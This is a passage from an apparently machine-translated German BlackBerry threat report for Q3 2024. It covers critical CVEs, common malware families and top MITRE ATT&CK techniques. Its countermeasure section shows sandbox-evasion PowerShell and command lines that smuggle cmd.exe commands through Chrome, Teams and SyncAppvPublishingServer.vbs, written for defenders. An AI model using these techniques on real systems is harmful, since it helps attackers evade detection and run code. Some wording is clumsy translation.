Geräte mit Internetzugang, wie z. B. VPN-Geräte, waren in diesem Quartal stärker als sonst betroffen. Leider sind diese Arten von Geräten möglicherweise nicht ausreichend mit einer Multi-Faktor-Authentifizierung gesichert. In einigen Fällen hat dieses Fehlen von MFA es Bedrohungsakteuren ermöglicht, Ransomware oder andere Malware in der Umgebung eines Kunden zu installieren und Unternehmensdaten zu exfiltrieren. Dies unterstreicht die Notwendigkeit für Unternehmen, alle dem Internet ausgesetzten Systeme rechtzeitig ordnungsgemäß abzusichern(MITRE - External Remote Services) und die Angriffsfläche wenn möglich zu reduzieren, indem sie moderne Alternativen wie Zero Trust Network Access (ZTNA) Lösungen verwenden.
Der Missbrauch von Zugangsdaten ehemaliger Mitarbeiter ist eine weitere häufige Masche. Zwar sollten die Anmeldedaten der Mitarbeiter gelöscht werden, sobald sie das Unternehmen verlassen, doch geschieht dies nicht immer. Alte Konten können einem Bedrohungsakteur potenziell vollen Zugang zum Netzwerk und den Systemen des Unternehmens verschaffen. Dies unterstreicht die Notwendigkeit für Unternehmen, starke Authentifizierungssicherheitskontrollen auf allen Systemen zu implementieren(MITRE - Valid Accounts).
Allgemeine Schwachstellen und Gefährdungen
Auswirkungen und Statistiken
Das CVE-System (Common Vulnerabilities and Exposures - Gemeinsame Schwachstellen und Gefährdungen) bietet einen Rahmen für die Identifizierung, Standardisierung und Veröffentlichung von bekannten Sicherheitsschwachstellen und Gefährdungen. Von Juli bis September 2024 meldete das National Institute of Standards and Technology (NIST) 8.659 neue CVEs.
Obwohl in diesem Quartal weniger CVEs entdeckt wurden als im letzten, ist der Schweregrad dieser CVEs deutlich gestiegen. Im letzten Quartal hatten 8 % der CVEs einen Schweregrad von 9,0 oder höher, während der Prozentsatz in diesem Quartal auf einen neuen Höchststand von 14 % gestiegen ist.
Abbildung 18: CVE-Bewertung Juli - September 2024.
Die kritischsten CVEs in diesem Quartal:
CVE-2024-4879 (9.3 Kritisch) Beliebige Codeausführung: Diese ServiceNow-Schwachstelle ermöglicht es nicht authentifizierten Benutzern, Code innerhalb der Now Platform aus der Ferne auszuführen. Es handelt sich um eine Jelly Template Injection-Schwachstelle, diedie UI-Makros von ServiceNow ausnutzt. Diese Sicherheitsanfälligkeit kann potenziell mit CVE-2024-5178 (6.9 Medium) Unauthorized Access und CVE-2024-5217 (9.2 Critical) Arbitrary Code Execution verkettet werden, wodurch eine unautorisierte Remotecodeausführung auf ServiceNow MID-Servern ermöglicht wird.
CVE-2024-43491 (9.8 Kritisch) Willkürliche Codeausführung: Diese Sicherheitsanfälligkeit, die den Microsoft Service Stack betrifft, führt zuvor entschärfte Sicherheitslücken in Windows 10 wieder ein. Sie ermöglicht Remotecodeausführung ohne Benutzerinteraktion, was zu einer vollständigen Kompromittierung des Systems führen kann. Sowohl ein Service Stack-Update als auch ein Windows-Sicherheitsupdate wurden veröffentlicht, um diese Sicherheitslücke zu schließen.
CVE-2024-38194 (9.9 Kritisch) Umgehung der Authentifizierung: Diese Schwachstelle entsteht durch eine unsachgemäße Autorisierung innerhalb von Azure-Webanwendungen, die es einem authentifizierten Angreifer ermöglicht, seine Berechtigungen über ein Netzwerk zu erweitern. Wird diese Schwachstelle ausgenutzt, kann sie die Sicherheit der Anwendungen und der angeschlossenen Systeme gefährden, was zu unbefugtem Datenzugriff, Unterbrechung von Diensten oder böswilliger Änderung des Anwendungsverhaltens führen kann.
CVE-2024-21416 (9.8 Kritisch) Willkürliche Codeausführung: Im Zusammenhang mit einer Windows-TCP/IP-Schwachstelle (Remote Code Execution, RCE) könnte diese Ausnutzung Angreifern ermöglichen, beliebigen Code auf dem Zielsystem auszuführen und möglicherweise vollständigen Zugriff zu erlangen.
CVE-2024-47575 (9.8 Kritisch) Umgehung der Authentifizierung: Die als "FortiJump" bekannte und als CVE-2024-47575 verfolgte Schwachstelle wurde kurz nach dem Berichtszeitraum bekannt gegeben und beinhaltet Zero-Day-Angriffe des neu entdeckten Bedrohungsakteurs UNC5820. Er missbraucht eine Schwachstelle zur Ausführung von API-Befehlen, die es Angreifern ermöglicht, die Authentifizierung zu umgehen und Befehle auf angreifbaren Systemen auszuführen. Im Fortinet-Advisory vom Oktober heißt es, dass diese Schwachstelle "einem entfernten, nicht authentifizierten Angreifer die Ausführung von beliebigem Code oder Befehlen über speziell gestaltete Anfragen ermöglichen kann".
Vorherrschende Bedrohungen nach Plattform: Windows
FakeUpdates/SocGholish
Downloader
JavaScript-basierter Downloader, der den Benutzern gefälschte Browser-Updates präsentiert. Es ist bekannt, dass er zusätzliche Nutzlasten wie AZORult, GootLoader und RedLine herunterlädt.
Formbuch/xLoader
Infostealer
Hochentwickelte Malware, die sowohl als Infostealer als auch als Downloader fungiert. Setzt Anti-VM-Techniken, Prozessinjektion und benutzerdefinierte Verschlüsselungsroutinen ein, um die Cybersicherheitsabwehr zu umgehen. Stehlen von Daten aus Browsern, E-Mail-Clients und verschiedenen Anwendungen.
QakBot
Botnet/Dropper
Erstmals 2008 entdeckt, jetzt in Version 5.0. Bietet umfangreiche Möglichkeiten für die Datenexfiltration und laterale Bewegungen. Bekannt dafür, dass er nach der Installation mehrere Malware-Typen ausliefert.
Agent Tesla
Infostealer
.NET-basierter Infostealer, der als MaaS verkauft wird und in erster Linie zum Sammeln von Anmeldedaten dient. Obwohl die Infrastruktur des FBI/DOJ 2023 abgeschaltet wurde, ist er mit neuen Persistenzmechanismen wieder aufgetaucht, um die Wiederherstellung des Hosts zu überleben.
njRAT
Fernzugriff-Trojaner
RAT konzentrierte sich auf die Erfassung von Benutzerdaten und verfügte über Funktionen wie Kamerazugriff, Diebstahl von Anmeldeinformationen, Überwachung von Dateiinteraktionen und Protokollierung von Tastatureingaben.
AsyncRAT
Fernzugriff-Trojaner
Wird in der Regel zusammen mit anderer Malware verbreitet. Empfängt C2-Server-Befehle, um Benutzerdaten zu erfassen und bestimmte Prozesse zu beenden. Verfügt über Botnet-Fähigkeiten.
LummaC2
Infostealer
C-basierter Infostealer, der es auf kommerzielle Unternehmen und kritische Infrastrukturorganisationen abgesehen hat. Konzentriert sich auf die Exfiltration sensibler Daten und wird über Untergrundforen und Telegram-Gruppen verbreitet.
Remcos
Fernzugriff-Trojaner
Fernsteuerungs- und Überwachungsanwendung für unbefugten Fernzugriff und Gerätesteuerung.
RedLine
Infostealer
Nutzt verschiedene Anwendungen und Dienste, um die Daten der Opfer zu exfiltrieren, darunter Kreditkarteninformationen, Passwörter und Cookies.
Phorpiex
Botnetz
Botnet, das sich auf die Verbreitung von Malware spezialisiert hat und für seine Beteiligung an Erpressungskampagnen im X-Rating-Bereich bekannt ist.
Vorherrschende Bedrohungen nach Plattform: Linux
Mirai
Botnetz
Die neueste Version nutzt Zero-Day-Schwachstellen in CCTV-Kameras aus und ist weiterhin sehr aktiv. Die "Corona"-Variante verbreitet sich durch Einspeisung von Schadcode in kompromittierte Kameras.
Gafgyt/Bashlit
Botnetz
IoT-fokussiertes Linux-Botnet, das C2-Server für groß angelegte DDoS-Angriffe nutzt. Die neueste Version zielt auf schwache SSH-Passwörter für GPU-Krypto-Mining ab.
Ransomware spielen
Ransomware
Neue Variante, die speziell auf ESXi-Umgebungen abzielt. Dies ist die erste Ausweitung der Gruppe auf Linux-Systeme im Vergleich zu ihren früheren, auf Windows ausgerichteten Doppelerpressungsangriffen. Verschlüsselt selektiv Dateien in Linux ESXi-Umgebungen.
Hadooken
Botnetz
Neue Linux-Malware, die Krypto-Mining-Funktionen mit DDoS-Angriffstools kombiniert. Zielt auf Schwachstellen in Systemen wie Oracle WebLogic Server ab.
Verbreitete Bedrohungen nach Plattform: macOS
Atomare Stehler (AMOS)
Infostealer
Neue Varianten, die als verschiedene Anwendungen getarnt sind und über DMG-Disk-Images verteilt werden. Ziel sind Passwörter, Browser-Cookies, Autofill-Daten, Krypto-Brieftaschen und Mac-Schlüsselbunddaten.
Chtulu
Infostealer
MaaS-basierter Infostealer, der als Trojaner-DMG verbreitet wird. Zu den Aktivitäten nach der Infektion gehören das Sammeln von Schlüsselbund-Passwörtern, Browser-Cookies, Telegram-Kontoinformationen, Kryptowährungs-Wallets und Benutzerdaten für den C2-Server-Upload.
Macma
Hintertür
Jüngste Updates werden der chinesischen APT-Gruppe Evasive Panda zugeschrieben. Baut Persistenz auf, bevor er Keylogger- und Medienerfassungsfunktionen für die Datenexfiltration auf C2-Server einsetzt.
TodoSwift
Downloader
Verbreitet über PDF-Täuschungen mit Bitcoin-Preisen. Wird der nordkoreanischen Gruppe BlueNoroff zugeschrieben und ist in der Lage, zusätzliche bösartige Binärdateien über C2-Serververbindungen herunterzuladen.
Vorherrschende Bedrohungen nach Plattform: Android
Nekro-Trojaner
Downloader
Verbreitet über den Google Play Store und bösartige Software Development Kits (SDKs). Zu den Funktionen gehören das Starten unsichtbarer Werbung, das Herunterladen zusätzlicher Nutzdaten, die Installation von Anwendungen Dritter, die Ausführung zusätzlichen Codes und die C2-Server-Kommunikation.
Okto2
Infostealer
Verbreitet über trojanisierte Versionen von NordVPN und Google Chrome. Eine Exobot-Variante, die es vor allem auf Bankkontoinformationen abgesehen hat und über Fernzugriffsfunktionen und C2-Server-Kommunikation verfügt.
Ajina
Infostealer
Wird durch Social Engineering und Phishing verbreitet, insbesondere über Telegram. Stehlen von Bankanmeldeinformationen und SMS-Daten, um die 2FA-Authentifizierung von Bankanwendungen abzufangen.
Gemeinsame MITRE-Techniken
Das Verständnis der Techniken von Bedrohungsgruppen auf höchster Ebene kann bei der Entscheidung helfen, welche Erkennungstechniken Priorität haben sollten. BlackBerry beobachtete in diesem Berichtszeitraum die folgenden 20 Techniken, die von Bedrohungsakteuren eingesetzt wurden.
Abbildung 19: Die 20 wichtigsten beobachteten MITRE-Techniken, Juni - September 2024.
Erkannte Techniken
Die folgende Tabelle zeigt die 20 wichtigsten Techniken, die in diesem Quartal von Bedrohungsakteuren eingesetzt wurden. Ein nach oben gerichteter Pfeil (↑) in der Spalte "Veränderung" bedeutet, dass die Nutzung der Technik seit unserem letzten Bericht zugenommen hat. Ein Pfeil nach unten (↓) bedeutet, dass die Nutzung seit unserem letzten Bericht zurückgegangen ist. Ein Gleichheitszeichen (=) zeigt an, dass die Technik im Vergleich zu unserem letzten Bericht unverändert geblieben ist.
Technik Name | Technik-ID | Taktik Name | Letzter Bericht | Ändern Sie |
---|---|---|---|---|
Hijack-Ausführungsablauf
|
T1574
|
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
1
|
=
|
DLL-Seiten-Laden
|
T1574.002
|
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
2
|
=
|
Virtualisierung/
Sandbox-Umgehung |
T1497
|
Umgehung der Verteidigung, Entdeckung
|
NA
|
↑
|
Suche nach Systeminformationen
|
T1082
|
Entdeckung
|
5
|
↑
|
Eingabe-Erfassung
|
T1056
|
Zugangsberechtigung, Sammlung
|
4
|
↓
|
Software-Entdeckung
|
T1518
|
Entdeckung
|
6
|
=
|
Entdeckung von Sicherheitssoftware
|
T1518.001
|
Entdeckung
|
7
|
=
|
Geplanter Task/Job
|
T1053
|
Ausführung, Persistenz, Privilegieneskalation
|
19
|
↑
|
DLL-Suchauftrags-Hijacking
|
T1574.001
|
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
NA
|
↑
|
Prozess Injektion
|
T1055
|
Umgehung von Verteidigungsmaßnahmen, Eskalation von Privilegien
|
3
|
↓
|
Maskerade
|
T1036
|
Verteidigung Umgehung
|
10
|
↓
|
Prozess Entdeckung
|
T1057
|
Entdeckung
|
8
|
↓
|
Systemprozess erstellen oder modifizieren
|
T1543
|
Persistenz, Privilegieneskalation
|
NA
|
↑
|
Windows-Dienst
|
T1543.003
|
Persistenz, Privilegieneskalation
|
NA
|
↑
|
Boot- oder Logon-AutoStart-Ausführung
|
T1547
|
Persistenz, Privilegieneskalation
|
14
|
↓
|
Registry Run Keys/Startup Folder
|
T1547.001
|
Persistenz, Privilegieneskalation
|
15
|
↓
|
Suche nach Dateien und Verzeichnissen
|
T1083
|
Entdeckung
|
9
|
↓
|
Fernerkundung von Systemen
|
T1018
|
Entdeckung
|
13
|
↓
|
Interpreter für Befehle und Skripte
|
T1059
|
Ausführung
|
NA
|
↑
|
Verteidigungen beeinträchtigen
|
T1562
|
Verteidigung Umgehung
|
17
|
↓
|
Technik-ID | |
---|---|
Hijack-Ausführungsablauf |
T1574
|
DLL-Seiten-Laden |
T1574.002
|
Virtualisierung/ Sandbox-Umgehung |
T1497
|
Suche nach Systeminformationen |
T1082
|
Eingabe-Erfassung |
T1056
|
Software-Entdeckung |
T1518
|
Entdeckung von Sicherheitssoftware |
T1518.001
|
Geplanter Task/Job |
T1053
|
DLL-Suchauftrags-Hijacking |
T1574.001
|
Prozess Injektion |
T1055
|
Maskerade |
T1036
|
Prozess Entdeckung |
T1057
|
Systemprozess erstellen oder modifizieren |
T1543
|
Windows-Dienst |
T1543.003
|
Boot- oder Logon-AutoStart-Ausführung |
T1547
|
Registry Run Keys/Startup Folder |
T1547.001
|
Suche nach Dateien und Verzeichnissen |
T1083
|
Fernerkundung von Systemen |
T1018
|
Interpreter für Befehle und Skripte |
T1059
|
Verteidigungen beeinträchtigen |
T1562
|
Taktik Name | |
---|---|
Hijack-Ausführungsablauf |
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
DLL-Seiten-Laden |
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
Virtualisierung/ Sandbox-Umgehung |
Umgehung der Verteidigung, Entdeckung
|
Suche nach Systeminformationen |
Entdeckung
|
Eingabe-Erfassung |
Zugangsberechtigung, Sammlung
|
Software-Entdeckung |
Entdeckung
|
Entdeckung von Sicherheitssoftware |
Entdeckung
|
Geplanter Task/Job |
Ausführung, Persistenz, Privilegieneskalation
|
DLL-Suchauftrags-Hijacking |
Persistenz, Eskalation von Privilegien, Umgehung von Verteidigungsmaßnahmen
|
Prozess Injektion |
Umgehung von Verteidigungsmaßnahmen, Eskalation von Privilegien
|
Maskerade |
Verteidigung Umgehung
|
Prozess Entdeckung |
Entdeckung
|
Systemprozess erstellen oder modifizieren |
Persistenz, Privilegieneskalation
|
Windows-Dienst |
Persistenz, Privilegieneskalation
|
Boot- oder Logon-AutoStart-Ausführung |
Persistenz, Privilegieneskalation
|
Registry Run Keys/Startup Folder |
Persistenz, Privilegieneskalation
|
Suche nach Dateien und Verzeichnissen |
Entdeckung
|
Fernerkundung von Systemen |
Entdeckung
|
Interpreter für Befehle und Skripte |
Ausführung
|
Verteidigungen beeinträchtigen |
Verteidigung Umgehung
|
Letzter Bericht | |
---|---|
Hijack-Ausführungsablauf |
1
|
DLL-Seiten-Laden |
2
|
Virtualisierung/ Sandbox-Umgehung |
NA
|
Suche nach Systeminformationen |
5
|
Eingabe-Erfassung |
4
|
Software-Entdeckung |
6
|
Entdeckung von Sicherheitssoftware |
7
|
Geplanter Task/Job |
19
|
DLL-Suchauftrags-Hijacking |
NA
|
Prozess Injektion |
3
|
Maskerade |
10
|
Prozess Entdeckung |
8
|
Systemprozess erstellen oder modifizieren |
NA
|
Windows-Dienst |
NA
|
Boot- oder Logon-AutoStart-Ausführung |
14
|
Registry Run Keys/Startup Folder |
15
|
Suche nach Dateien und Verzeichnissen |
9
|
Fernerkundung von Systemen |
13
|
Interpreter für Befehle und Skripte |
NA
|
Verteidigungen beeinträchtigen |
17
|
Ändern Sie | |
---|---|
Hijack-Ausführungsablauf |
=
|
DLL-Seiten-Laden |
=
|
Virtualisierung/ Sandbox-Umgehung |
↑
|
Suche nach Systeminformationen |
↑
|
Eingabe-Erfassung |
↓
|
Software-Entdeckung |
=
|
Entdeckung von Sicherheitssoftware |
=
|
Geplanter Task/Job |
↑
|
DLL-Suchauftrags-Hijacking |
↑
|
Prozess Injektion |
↓
|
Maskerade |
↓
|
Prozess Entdeckung |
↓
|
Systemprozess erstellen oder modifizieren |
↑
|
Windows-Dienst |
↑
|
Boot- oder Logon-AutoStart-Ausführung |
↓
|
Registry Run Keys/Startup Folder |
↓
|
Suche nach Dateien und Verzeichnissen |
↓
|
Fernerkundung von Systemen |
↓
|
Interpreter für Befehle und Skripte |
↑
|
Verteidigungen beeinträchtigen |
↓
|
Bekannte Techniken des Gegners
In diesem Quartal erwies sich Hijacking Execution Flow (T1574) als die von Angreifern am häufigsten verwendete Technik, während ihre Untertechnik, DLL Side-Loading (T1574.002), an zweiter Stelle stand. Bei diesen Methoden manipulieren die Angreifer die Art und Weise, wie Betriebssysteme Programme ausführen, z. B. durch Side-Loading von DLLs, häufig zur Umgehung von Sicherheitssystemen.
Bemerkenswert ist auch der Aufstieg der Technik Virtualization/Sandbox Evasion (T1497) unter die ersten drei. Dies deutet darauf hin, dass die von den Angreifern eingesetzte Malware stark auf die Erkennung von Schadprogrammen ausgerichtet war, wie die untersuchten Binärdateien zeigen, die zu diesen Schlussfolgerungen führten.
Erkannte Taktiken
Die drei wichtigsten Taktiken in diesem Quartal sind Defense Evasion, Privilege Escalation und Persistence, wie in Abbildung 20 dargestellt.
Abbildung 20: MITRE ATT&CK-Taktiken, Juni - September 2024
-
Angewandte Gegenmaßnahmen
Das BlackBerry Threat Research and Intelligence-Team hat die folgenden MITRE-Techniken analysiert, die häufig von Bedrohungsakteuren eingesetzt werden:
-
Virtualisierung/Sandbox-Umgehung - T1497
Virtualisierungs-/Sandbox-Umgehung (T1497) ist eine Technik im Rahmen der Taktik "Defense Evasion" (TA0005). Diese Technik dient dazu, virtualisierte oder Sandbox-Umgebungen zu erkennen, die typischerweise von Malware-Analyse- und Bedrohungserkennungslösungen verwendet werden. Durch die Identifizierung dieser Umgebungen können böswillige Akteure der Erkennung entgehen, indem sie das Verhalten ihrer Nutzlast anhalten oder ändern, was die Analysetools daran hindert, die Bedrohung genau zu bewerten.
Angreifer nutzen die Virtualisierungs-/Sandbox-Umgehungstechnik, um zu überprüfen, ob ihre Nutzlast in einer Analyseumgebung und nicht auf einem echten Host ausgeführt wird. Dies ist entscheidend für die Umgehung der Erkennung und ermöglicht es der Malware, im Verborgenen zu bleiben. Die Nutzlast kann so konfiguriert werden, dass sie sich je nach Umgebungsprüfung unterschiedlich verhält, nur in realen Umgebungen ausgeführt wird und die Aktivierung verhindert, wenn virtuelle oder Sandbox-Umgebungen erkannt werden.
Häufige Anzeichen für die Anwesenheit eines Gegners können sein:
- Registry-Einträge und Systemartefakte, die mit VMs verbunden sind.
- Hinweise auf die Hardwarekonfiguration, wie z. B. bestimmte Virtualisierungstreiber oder niedrige Ressourcenlimits, die auf eine Sandbox-Umgebung hindeuten können.
- Prozesse oder Dateipfade, die an beliebte Sandboxing-Tools oder virtuelle Umgebungen gebunden sind.
- Überprüfung des Systemverhaltens oder der Betriebszeit, um festzustellen, ob die Umgebung neu initialisiert wurde, was bei Sandbox-Konfigurationen häufig der Fall ist.
Angreifer verwenden häufig PowerShell oder Batch-Skripte mit eingebetteten Systemprüfungen, um virtualisierte Bedingungen zu erkennen. Nachfolgend finden Sie ein Beispiel für einen PowerShell-Befehl, der verwendet wird, um die Sandbox-Analyse zu umgehen, indem er das Vorhandensein einer VM überprüft:
Get-WmiObject -Class Win32_BIOS | Select-String "VMware|VirtualBox|Xen"
Wenn der Befehl einen Treffer liefert, kann die Nutzlast ihren Ausführungspfad ändern oder sich beenden und so einer weiteren Analyse in einer virtualisierten Umgebung entgehen.
-
Elektronenanwendungen - T1218.015
Electron-Anwendungen sind Desktop-Anwendungen, die mit Webtechnologien wie HTML, CSS und JavaScript erstellt werden. Sie werden mit dem Electron-Framework entwickelt, das die Chromium-Rendering-Engine mit der Node.js-Laufzeitumgebung kombiniert.
Da Electron-Anwendungen umfangreiche Systemberechtigungen anfordern können, kann ein Angreifer diesen Zugriff ausnutzen, um Befehle oder Skripte mit denselben Berechtigungen wie die Anwendung selbst auszuführen.
Bedrohungsakteure können die Möglichkeit nutzen, beliebige Befehle auszuführen, um bösartigen Code über legitime Prozesse auszuführen, indem sie die System-Binär-Proxy-Ausführung verwenden. Beispiel: chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe" zeigt, wie die System-Binary-Proxy-Ausführung ausgenutzt werden kann. Durch Verwendung der Option --disable-gpu-sandbox schwächt der Bedrohungsakteur die Sicherheit von Chrome, indem er die Prozessisolierung deaktiviert. Die --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe" ermöglicht es Angreifern, beliebige Befehle über cmd.exe auszuführen.
Ein weiteres Beispiel ist: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&", das cmd.exe als Kindprozess erzeugt, um den beliebigen Befehl auszuführen, während die GPU-Sandbox deaktiviert wird, so dass der Prozess ohne Isolierung ausgeführt werden kann.
-
SyncAppvPublishingServer - T1216.002
In der jüngsten MITRE V15-Aktualisierung wurde die ursprüngliche Technik der System Script Proxy Execution (T1216) um eine neue Untertechnik mit der Bezeichnung T1216.002 und dem Namen SyncAppvPublishingServer erweitert. Diese Untertechnik fällt unter die Taktik Defense Evasion (TA0005) und wird von Angreifern manipuliert, um die Ausführung bösartiger PowerShell-Befehle zu ermöglichen.
SyncAppvPublishingServer.vbs ist ein legitimes Visual Basic-Skript, das mit Microsoft und seiner Anwendungsvirtualisierung (App-V) verbunden ist, die es Windows ermöglicht, Anwendungen zu virtualisieren. Das Skript SyncAppvPublishingServer.vbs ist von Microsoft signiert, was es glaubwürdig macht.
Böswillige Akteure nutzen diese Subtechnik aus, um die Ausführungsbeschränkungen von PowerShell zu umgehen und Erkennungssysteme zu umgehen, indem sie native, vertrauenswürdige Prozesse verwenden, eine Methode, die allgemein als "living off the land" bekannt ist. Dies ermöglicht die Ausführung bösartiger Befehle, während sie sich in die systemeigenen Abläufe einfügen.
Here is an example command line of how this can be invoked:
“SyncAppvPublishingServer.vbs "n; {Malicious PowerShell Command}"”
Blick nach vorn
Dieser 90-Tage-Bericht, der den Zeitraum von Juli bis September 2024 abdeckt, soll Ihnen helfen, informiert und auf künftige Bedrohungen vorbereitet zu sein. Hochkarätige kriminelle Gruppen, insbesondere Ransomware-Betreiber, nutzen neue Schwachstellen aus und finden Wert in großen und kleinen Zielen. Wie der Bericht feststellt, beobachteten BlackBerry-Forscher allein in diesem Quartal fast zwei Millionen gestoppte Angriffe. Angesichts dieser Aktivitäten ist es wichtig, dass Sie sich über die neuesten Sicherheitsnachrichten für Ihre Branche und Region auf dem Laufenden halten.
Hier erfahren Sie, was Sie in den kommenden Monaten erwarten können:
Telekommunikation unter Beschuss
Der Telekommunikationssektor erwies sich 2024 als ein Hauptziel, wie das Beispiel der AT&T-Verletzung zeigt, bei der Anruf- und Textdaten aus dem gesamten AT&T-Netz abgefangen wurden. Für 2025 erwarten wir, dass Angreifer zunehmend die Telekommunikationsinfrastruktur und nicht mehr einzelne Geräte ins Visier nehmen werden, um die Kommunikation in großem Umfang abzufangen. Der Vorfall auf Salt Typhoon hat gezeigt, wie raffinierte Akteure Schwachstellen auf Netzwerkebene ausnutzen können, um herkömmliche Sicherheitsmaßnahmen zu umgehen. Diese Verlagerung von gerätespezifischer Malware zu Angriffen auf Infrastrukturebene stellt eine große Herausforderung dar, da Unternehmen nun ihren Ansatz zur Sicherung sensibler Kommunikation über öffentliche Telekommunikationsnetze überdenken müssen.
Infodiebe und gestohlene Daten auf Schwarzmärkten
Während des gesamten Jahres 2024 waren Infostealer in unseren vierteljährlichen Berichten über Bedrohungen ein Hauptthema. Berüchtigte Infostealer standen häufig ganz oben auf unseren Listen der Top-Bedrohungen und waren mehrfach an Angriffen auf der ganzen Welt beteiligt. Nach Angaben von Interpol ist der Verkauf von Protokollen, die von Infostealern gesammelt wurden, im Jahr 2023 um 40 % gestiegen. Für das Jahr 2025 wird mit einem weiteren Anstieg gerechnet.
Patchen und Ausnutzen
Die Ausnutzung nicht veröffentlichter oder neu entdeckter Schwachstellen durch Bedrohungsakteure, insbesondere Ransomware-Banden, ist kein neues Phänomen. Die Geschwindigkeit, mit der diese Schwachstellen ausgenutzt werden, macht es für IT-Fachleute jedoch immer schwieriger, mitzuhalten. Dies gilt insbesondere in unserer hypervernetzten Welt mit ihren unzähligen Prozessen, Anwendungen und Diensten. Cyberkriminelle sind sich dessen bewusst und versuchen aktiv, Schwachstellen in der IT-Infrastruktur und Sicherheit eines Unternehmens auszunutzen, um davon zu profitieren.
In diesem Berichtszeitraum wurden über 50 % aller neuen CVEs mit über 7,0 bewertet. Die schnelle Ausnutzung von CVEs und die Bewaffnung von Proof-of-Concepts (PoCs) dürften auch im neuen Jahr eine große Herausforderung für die Branche darstellen.
Ransomware-Neuauflagen und Wiederauftauchen
In den letzten Jahrzehnten haben Strafverfolgungsbehörden und Cybersicherheitsexperten Katz und Maus mit Ransomware-Entwicklern und -Verbündeten gespielt. Wie in unserem Abschnitt über Lynx-Ransomware erwähnt, handelt es sich bei den meisten Gruppen jedoch um Zusammenschlüsse anderer Gruppen, die häufig einen neuen Namen tragen und anderen Ransomware-Code verwenden oder bösartige Code-Basen von anderen Malware-Autoren kaufen. Dieser Trend der Umbenennung, des Wiederauftauchens und der Wiederverwendung von Ransomware wird sich wahrscheinlich fortsetzen, da die Einstiegshürde in die Cyberkriminalität immer niedriger wird.
Nordkoreanische Fernarbeitskräfte und falsche Identitäten
Nordkoreanische Spione haben Berichten zufolge versucht, westliche IT-Unternehmen zu infiltrieren, indem sie sich als Remote-Mitarbeiter ausgaben. Diese Cyberkriminellen legten sorgfältig falsche Identitäten an, wiesen die erforderlichen Fähigkeiten nach, um Bewerbungsgespräche und Tests zu bestehen, und verschleierten ihren Standort, um nicht als Nordkoreaner zu erscheinen. In einigen Fällen verwendeten sie die Deepfake-Technologie. Sobald sie eingestellt waren, versuchten sie, interne Daten zu exfiltrieren und Fernzugriffsprogramme zu installieren.
Wir gehen davon aus, dass dieser Trend zur Fälschung von Identitäten, um Organisationen zu infiltrieren, bis 2025 anhalten wird. Es ist wahrscheinlich, dass Nordkorea noch mehr dieser verdeckten Agenten eingesetzt hat, die noch nicht entdeckt worden sind, und dass sie ihre Taktik wahrscheinlich weiterentwickeln werden, um einer Entdeckung besser zu entgehen.
Besuchen Sie den BlackBerry-Blog und bleiben Sie auf dem Laufenden über die neuesten Cybersecurity-Bedrohungen und -Abwehrmaßnahmen.
Danksagung
Dieser Bericht ist das Ergebnis der gemeinsamen Bemühungen unserer talentierten Teams und Einzelpersonen.
Insbesondere möchten wir folgenden Personen unsere Anerkennung aussprechen:
- Adam Polak
- Adrian Chambers
- Alan McCarthy
- Amalkanth Raveendran
- Anne-Carmen Dittmer
- Cesar Vargas
- Daniel Corry
- Dekan gegeben
- Geoff O'Rourke
- John de Boer
- Ismael Valenzuela Espejo
- Markson Leite
- Maristela Ames
- Matthew Manning
- Natalia Ciapponi
- Natascha Rohner
- Ronald Welch
- Samuel Rios
- Thom Ables
- Travis Hoxmeier
- William Johnson
- XingChen Yang